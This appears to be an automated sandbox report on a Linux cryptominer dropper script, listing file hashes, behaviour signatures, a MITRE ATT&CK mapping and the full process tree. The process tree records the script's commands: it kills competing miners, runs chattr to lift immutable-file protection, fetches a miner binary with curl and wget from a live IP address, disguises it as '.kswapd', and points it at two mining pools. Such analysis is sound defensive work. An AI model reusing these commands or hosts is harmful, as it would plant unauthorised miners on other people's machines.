5a7a5f792a6cb4a38d7cb0a61fa5e3e3c3dabaf11159404613c3dbb5cf13ad48

General

Target

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Size

5KB
MD5

7b72cf30ac42c20f0a14b0b87425c00a
SHA1

74402152ac0f0c9dfed6f76975080ce1d0d4584d
SHA256

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
SHA512

1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
SSDEEP

96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

.kswapd.kswapd

ioc pid process

/.cache/.kswapd 906 .kswapd
/.cache/.kswapd 1103 .kswapd

ioc	pid	process
/.cache/.kswapd	906	.kswapd
/.cache/.kswapd	1103	.kswapd

Attempts to change immutable files 37 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

grepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepchattrgrepchattrgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrep

pid	process
838	grep
849	grep
877	grep
1024	grep
1036	grep
1044	grep
1079	grep
826	grep
1064	grep
1072	grep
857	grep
861	grep
1052	grep
1068	grep
830	grep
822	grep
842	grep
814	grep
975	chattr
1056	grep
768	chattr
890	grep
1016	grep
1032	grep
1060	grep
1086	grep
818	grep
865	grep
869	grep
873	grep
1028	grep
1048	grep
834	grep
853	grep
1020	grep
1040	grep
810	grep

Enumerates running processes
Discovers information about currently running processes on the system
Write file to user bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /usr/local/bin/.QJHGrsevi 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for modification	/usr/local/bin/.QJHGrsevi	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

Reads CPU attributes 1 TTPs 6 IoCs

System Information Discovery

T1082

Processes:

pspspspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspspsps

description	ioc	process
File opened for reading	/proc/371/cmdline	ps
File opened for reading	/proc/388/stat	ps
File opened for reading	/proc/22/cmdline	ps
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/16/cmdline	ps
File opened for reading	/proc/37/stat	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/487/cmdline	ps
File opened for reading	/proc/755/cmdline	ps
File opened for reading	/proc/765/cmdline	ps
File opened for reading	/proc/980/cmdline	ps
File opened for reading	/proc/111/cmdline	ps
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/23/stat	ps
File opened for reading	/proc/699/status	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/486/status	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/694/stat	ps
File opened for reading	/proc/228/cmdline	ps
File opened for reading	/proc/320/stat	ps
File opened for reading	/proc/372/cmdline	ps
File opened for reading	/proc/101/status	ps
File opened for reading	/proc/69/stat	ps
File opened for reading	/proc/74/cmdline	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/17/cmdline	ps
File opened for reading	/proc/326/stat	ps
File opened for reading	/proc/978/cmdline	ps
File opened for reading	/proc/988/cmdline	ps
File opened for reading	/proc/72/stat	ps
File opened for reading	/proc/80/cmdline	ps
File opened for reading	/proc/766/status	ps
File opened for reading	/proc/695/cmdline	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/75/status	ps
File opened for reading	/proc/228/status	ps
File opened for reading	/proc/988/status	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/371/status	ps
File opened for reading	/proc/766/cmdline	ps
File opened for reading	/proc/804/stat	ps
File opened for reading	/proc/317/cmdline	ps
File opened for reading	/proc/972/status	ps
File opened for reading	/proc/788/cmdline	ps
File opened for reading	/proc/450/stat	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/111/cmdline	ps
File opened for reading	/proc/694/stat	ps
File opened for reading	/proc/383/status	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/694/status	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/76/stat	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/11/status	ps
File opened for reading	/proc/450/status	ps
File opened for reading	/proc/76/stat	ps
File opened for reading	/proc/37/cmdline	ps
File opened for reading	/proc/762/cmdline	ps
File opened for reading	/proc/317/status	ps

Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /dev/shm/.QJHGrsevi 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /tmp/.QJHGrsevi 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for modification	/dev/shm/.QJHGrsevi	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for modification	/tmp/.QJHGrsevi	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
1⤵
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:698

/bin/uname
uname -a
2⤵
PID:704

/bin/rm
rm --help
2⤵
PID:709

/bin/grep
grep " rm does not remove dir"
2⤵
PID:710

/usr/bin/wc
wc -l
2⤵
PID:712

/bin/grep
grep -i "Dump libcurl equivalent"
2⤵
PID:717

/usr/bin/wc
wc -l
2⤵
PID:718

/usr/bin/curl
curl --help
2⤵
PID:716

/usr/bin/wget
wget --version
2⤵
PID:727

/bin/grep
grep -i "wgetrc "
2⤵
PID:728

/usr/bin/wc
wc -l
2⤵
PID:729

/usr/bin/head
head /dev/urandom
2⤵
PID:731

/usr/bin/tr
tr -dc A-Za-z0-9
2⤵
PID:732

/usr/bin/shuf
shuf -i 4-16 -n 1
2⤵
PID:735

/usr/bin/head
head -c 9
2⤵
PID:733

/bin/rm
rm -f /tmp/.QJHGrsevi
2⤵
PID:741

/bin/rm
rm -f /tmp/.QJHGrsevi
2⤵
PID:742

/bin/rm
rm -f /usr/local/bin/.QJHGrsevi
2⤵
PID:743

/bin/rm
rm -f /dev/shm/.QJHGrsevi
2⤵
PID:745

/bin/rm
rm -f /.QJHGrsevi
2⤵
PID:746

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:749

/bin/grep
grep -v grep
2⤵
PID:750

/bin/grep
grep -v defunct
2⤵
PID:751

/bin/grep
grep -v "sh "
2⤵
PID:752

/bin/grep
grep " sleep 120"
2⤵
PID:753

/usr/bin/wc
wc -l
2⤵
PID:754

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:757

/bin/grep
grep -v grep
2⤵
PID:758

/bin/grep
grep -v "sh "
2⤵
PID:759

/bin/grep
grep -v defunct
2⤵
PID:760

/bin/grep
grep " sleep 120"
2⤵
PID:761

/usr/bin/wc
wc -l
2⤵
PID:762

/bin/sleep
sleep 120
2⤵
PID:766

/bin/mkdir
mkdir -p /.cache/
2⤵
PID:767

/usr/bin/chattr
chattr -i /.cache/
2⤵
- Attempts to change immutable files
PID:768

/bin/chmod
chmod 1755 /.cache/
2⤵
PID:769

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:771

/bin/grep
grep -v l0
2⤵
PID:772

/bin/grep
grep -v eth1
2⤵
PID:773

/bin/grep
grep -v lan0
2⤵
PID:774

/bin/grep
grep -v "^-"
2⤵
PID:775

/bin/grep
grep -v eth0
2⤵
PID:776

/bin/grep
grep -v inet0
2⤵
PID:778

/bin/grep
grep -v lano
2⤵
PID:779

/bin/grep
grep -v grep
2⤵
PID:780

/bin/grep
grep -v defunct
2⤵
PID:781

/bin/grep
grep -v knthread
2⤵
PID:782

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:783

/bin/grep
grep -vi "java "
2⤵
PID:784

/bin/grep
grep -vi jenkins
2⤵
PID:785

/bin/grep
grep -vi exim
2⤵
PID:786

/usr/bin/head
head -n 1
2⤵
PID:788

/usr/bin/awk
awk "{if(\$3>=54.0) print \$11}"
2⤵
PID:787

/bin/grep
grep -v l0
2⤵
PID:791

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:790

/bin/grep
grep -v eth1
2⤵
PID:792

/bin/grep
grep -v lan0
2⤵
PID:793

/bin/grep
grep -v "^-"
2⤵
PID:794

/bin/grep
grep -v eth0
2⤵
PID:795

/bin/grep
grep -v inet0
2⤵
PID:796

/bin/grep
grep -v lano
2⤵
PID:797

/bin/grep
grep -v grep
2⤵
PID:798

/bin/grep
grep -v defunct
2⤵
PID:799

/bin/grep
grep -v python
2⤵
PID:800

/bin/grep
grep -v knthread
2⤵
PID:801

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:802

/bin/grep
grep -vi bash
2⤵
PID:803

/bin/grep
grep -vi exim
2⤵
PID:804

/usr/bin/awk
awk "{if(\$3>=0.0) print \$2}"
2⤵
PID:805

/usr/bin/uniq
uniq
2⤵
PID:806

/bin/readlink
readlink /proc/317/exe
2⤵
PID:808

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/317/exe
2⤵
- Attempts to change immutable files
PID:810

/bin/readlink
readlink /proc/319/exe
2⤵
PID:812

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/319/exe
2⤵
- Attempts to change immutable files
PID:814

/bin/readlink
readlink /proc/320/exe
2⤵
PID:816

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe
2⤵
- Attempts to change immutable files
PID:818

/bin/readlink
readlink /proc/326/exe
2⤵
PID:820

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe
2⤵
- Attempts to change immutable files
PID:822

/bin/readlink
readlink /proc/328/exe
2⤵
PID:824

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe
2⤵
- Attempts to change immutable files
PID:826

/bin/readlink
readlink /proc/371/exe
2⤵
PID:828

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/371/exe
2⤵
- Attempts to change immutable files
PID:830

/bin/readlink
readlink /proc/372/exe
2⤵
PID:832

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/372/exe
2⤵
- Attempts to change immutable files
PID:834

/bin/readlink
readlink /proc/383/exe
2⤵
PID:836

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/383/exe
2⤵
- Attempts to change immutable files
PID:838

/bin/readlink
readlink /proc/388/exe
2⤵
PID:840

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/388/exe
2⤵
- Attempts to change immutable files
PID:842

/bin/readlink
readlink /proc/450/exe
2⤵
PID:847

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/450/exe
2⤵
- Attempts to change immutable files
PID:849

/bin/readlink
readlink /proc/457/exe
2⤵
PID:851

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/457/exe
2⤵
- Attempts to change immutable files
PID:853

/bin/readlink
readlink /proc/690/exe
2⤵
PID:855

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/690/exe
2⤵
- Attempts to change immutable files
PID:857

/bin/readlink
readlink /proc/693/cwd
2⤵
PID:858

/bin/cat
cat /proc/693/comm
2⤵
PID:859

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
2⤵
- Attempts to change immutable files
PID:861

/bin/readlink
readlink /proc/694/cwd
2⤵
PID:862

/bin/cat
cat /proc/694/comm
2⤵
PID:863

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
2⤵
- Attempts to change immutable files
PID:865

/bin/readlink
readlink /proc/695/cwd
2⤵
PID:866

/bin/cat
cat /proc/695/comm
2⤵
PID:867

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
2⤵
- Attempts to change immutable files
PID:869

/bin/readlink
readlink /proc/699/exe
2⤵
PID:871

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/699/exe
2⤵
- Attempts to change immutable files
PID:873

/bin/readlink
readlink /proc/701/exe
2⤵
PID:875

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/701/exe
2⤵
- Attempts to change immutable files
PID:877

/bin/rm
rm -rf /usr/sbin/agent
2⤵
PID:882

/bin/readlink
readlink /proc/766/exe
2⤵
PID:888

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/766/exe
2⤵
- Attempts to change immutable files
PID:890

/bin/grep
grep x86_64
2⤵
PID:894

/usr/bin/wc
wc -l
2⤵
PID:895

/usr/bin/curl
curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
2⤵
PID:898

/usr/bin/wget
wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
2⤵
PID:902

/bin/chmod
chmod +x /.cache/.kswapd
2⤵
PID:905

/bin/sleep
sleep 120
2⤵
PID:973

/bin/mkdir
mkdir -p /.cache/
2⤵
PID:974

/usr/bin/chattr
chattr -i /.cache/
2⤵
- Attempts to change immutable files
PID:975

/bin/chmod
chmod 1755 /.cache/
2⤵
PID:976

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:978

/bin/grep
grep -v l0
2⤵
PID:979

/bin/grep
grep -v eth1
2⤵
PID:980

/bin/grep
grep -v lan0
2⤵
PID:981

/bin/grep
grep -v "^-"
2⤵
PID:982

/bin/grep
grep -v eth0
2⤵
PID:983

/bin/grep
grep -v inet0
2⤵
PID:984

/bin/grep
grep -v lano
2⤵
PID:985

/bin/grep
grep -v grep
2⤵
PID:986

/bin/grep
grep -v defunct
2⤵
PID:987

/bin/grep
grep -v knthread
2⤵
PID:988

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:989

/bin/grep
grep -vi "java "
2⤵
PID:990

/bin/grep
grep -vi jenkins
2⤵
PID:991

/bin/grep
grep -vi exim
2⤵
PID:992

/usr/bin/awk
awk "{if(\$3>=54.0) print \$11}"
2⤵
PID:993

/usr/bin/head
head -n 1
2⤵
PID:994

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:996

/bin/grep
grep -v l0
2⤵
PID:997

/bin/grep
grep -v eth1
2⤵
PID:998

/bin/grep
grep -v lan0
2⤵
PID:999

/bin/grep
grep -v "^-"
2⤵
PID:1000

/bin/grep
grep -v eth0
2⤵
PID:1001

/bin/grep
grep -v inet0
2⤵
PID:1002

/bin/grep
grep -v lano
2⤵
PID:1003

/bin/grep
grep -v grep
2⤵
PID:1004

/bin/grep
grep -v defunct
2⤵
PID:1005

/bin/grep
grep -v python
2⤵
PID:1006

/bin/grep
grep -v knthread
2⤵
PID:1007

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:1008

/bin/grep
grep -vi bash
2⤵
PID:1009

/bin/grep
grep -vi exim
2⤵
PID:1010

/usr/bin/awk
awk "{if(\$3>=0.0) print \$2}"
2⤵
PID:1011

/usr/bin/uniq
uniq
2⤵
PID:1012

/bin/readlink
readlink /proc/317/exe
2⤵
PID:1014

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/317/exe
2⤵
- Attempts to change immutable files
PID:1016

/bin/readlink
readlink /proc/319/exe
2⤵
PID:1018

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/319/exe
2⤵
- Attempts to change immutable files
PID:1020

/bin/readlink
readlink /proc/320/exe
2⤵
PID:1022

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe
2⤵
- Attempts to change immutable files
PID:1024

/bin/readlink
readlink /proc/326/exe
2⤵
PID:1026

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe
2⤵
- Attempts to change immutable files
PID:1028

/bin/readlink
readlink /proc/328/exe
2⤵
PID:1030

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe
2⤵
- Attempts to change immutable files
PID:1032

/bin/readlink
readlink /proc/371/exe
2⤵
PID:1034

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/371/exe
2⤵
- Attempts to change immutable files
PID:1036

/bin/readlink
readlink /proc/372/exe
2⤵
PID:1038

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/372/exe
2⤵
- Attempts to change immutable files
PID:1040

/bin/readlink
readlink /proc/383/exe
2⤵
PID:1042

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/383/exe
2⤵
- Attempts to change immutable files
PID:1044

/bin/readlink
readlink /proc/388/exe
2⤵
PID:1046

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/388/exe
2⤵
- Attempts to change immutable files
PID:1048

/bin/readlink
readlink /proc/450/exe
2⤵
PID:1050

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/450/exe
2⤵
- Attempts to change immutable files
PID:1052

/bin/readlink
readlink /proc/457/exe
2⤵
PID:1054

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/457/exe
2⤵
- Attempts to change immutable files
PID:1056

/bin/readlink
readlink /proc/693/cwd
2⤵
PID:1057

/bin/cat
cat /proc/693/comm
2⤵
PID:1058

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
2⤵
- Attempts to change immutable files
PID:1060

/bin/readlink
readlink /proc/694/cwd
2⤵
PID:1061

/bin/cat
cat /proc/694/comm
2⤵
PID:1062

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
2⤵
- Attempts to change immutable files
PID:1064

/bin/readlink
readlink /proc/695/cwd
2⤵
PID:1065

/bin/cat
cat /proc/695/comm
2⤵
PID:1066

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
2⤵
- Attempts to change immutable files
PID:1068

/bin/readlink
readlink /proc/883/exe
2⤵
PID:1070

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/883/exe
2⤵
- Attempts to change immutable files
PID:1072

/bin/rm
rm -rf /usr/sbin/agent "(deleted)"
2⤵
PID:1073

/bin/readlink
readlink /proc/971/cwd
2⤵
PID:1074

/bin/cat
cat /proc/971/comm
2⤵
PID:1076

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //kworker/0:0
2⤵
- Attempts to change immutable files
PID:1079

/bin/readlink
readlink /proc/973/exe
2⤵
PID:1084

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/973/exe
2⤵
- Attempts to change immutable files
PID:1086

/usr/bin/md5sum
md5sum /.cache/.kswapd
2⤵
PID:1090

/usr/bin/cut
cut -c 1-32
2⤵
PID:1091

/usr/bin/md5sum
md5sum /.cache/.kswapd
2⤵
PID:1093

/usr/bin/cut
cut -c 1-32
2⤵
PID:1094

/bin/grep
grep x86_64
2⤵
PID:1097

/usr/bin/wc
wc -l
2⤵
PID:1098

/usr/bin/curl
curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
2⤵
PID:1100

/usr/bin/wget
wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
2⤵
PID:1101

/bin/chmod
chmod +x /.cache/.kswapd
2⤵
PID:1102

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
- Executes dropped EXE
PID:906

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
- Executes dropped EXE
PID:1103

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Hijack Execution Flow

1

T1574

Privilege Escalation

Hijack Execution Flow

1

T1574

Defense Evasion

Hijack Execution Flow

1

T1574

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.QJHGrsevi
Filesize
10B

MD5
aa5057d980a3be15376cb6c92c04b9da

SHA1
2b9ebc4a8b48ec1759385e40899954be31faf4cd

SHA256
808fde5dd676e54423bcb4f17bc072ddf2be2c1e060cfacaff6eadc72990227d

SHA512
286010c0689512476409463521fe1a40d3d03522bffcbfa52aebda4e0d2125d56f4d89c98b55ee36942006b275a94cc2437a24769927fa8957bf96825bb95c5e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads